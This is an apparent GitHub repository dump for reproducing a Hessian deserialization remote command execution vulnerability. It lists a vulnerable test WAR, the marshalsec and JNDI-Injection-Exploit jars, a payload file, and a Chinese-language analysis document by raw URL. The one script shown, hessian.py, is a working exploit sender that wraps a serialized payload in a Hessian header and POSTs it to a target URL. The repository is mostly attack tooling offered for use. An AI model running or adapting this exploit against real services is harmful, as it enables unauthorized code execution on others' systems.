├── HessianTest.war
├── Hessian反序列化RCE复现及分析.doc
├── JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
├── README.md
├── hessian.py
├── hession
└── marshalsec-0.0.3-SNAPSHOT-all.jar

/HessianTest.war:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/HessianTest.war

--------------------------------------------------------------------------------
/Hessian反序列化RCE复现及分析.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/Hessian反序列化RCE复现及分析.doc

--------------------------------------------------------------------------------
/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Hessian-Deserialize-RCE
Hession-Deserialize-RCE: deserialization command execution

--------------------------------------------------------------------------------
/hessian.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# coding=utf-8
# code by 21superman
# Date: 2018-12-28
import requests
import argparse

def load(name):
    # Hessian call preamble ('c', version bytes) followed by a header ('H',
    # 2-byte length 4) named 'test'; the payload file supplies the header value.
    # The name is a bytes literal so the concatenation also works on Python 3.
    header=b'\x63\x02\x00\x48\x00\x04'+b'test'
    with open(name,'rb') as f:
        return header+f.read()

def send(url,payload):
    #proxies = {'http':'127.0.0.1:8888'}
    headers={'Content-Type':'x-application/hessian'}
    data=payload
    res=requests.post(url,headers=headers,data=data)
    return res.text

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", help="hessian site url eg.http://127.0.0.1:8080/HessianTest/hessian")
    parser.add_argument("-p",help="payload file")
    args = parser.parse_args()
    if args.u is None or args.p is None:
        print('eg. python hessian.py -u http://127.0.0.1:8080/HessianTest/hessian -p hessian')
    else:
        send(args.u, load(args.p))
if __name__ == '__main__':
    main()
    #load('hessian')

--------------------------------------------------------------------------------
/hession:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/hession

--------------------------------------------------------------------------------
/marshalsec-0.0.3-SNAPSHOT-all.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AngryDinosaur88/Hessian-Deserialize-RCE/67784dbfb07eb788fab4c46d5a54ed060b8c56c8/marshalsec-0.0.3-SNAPSHOT-all.jar

--------------------------------------------------------------------------------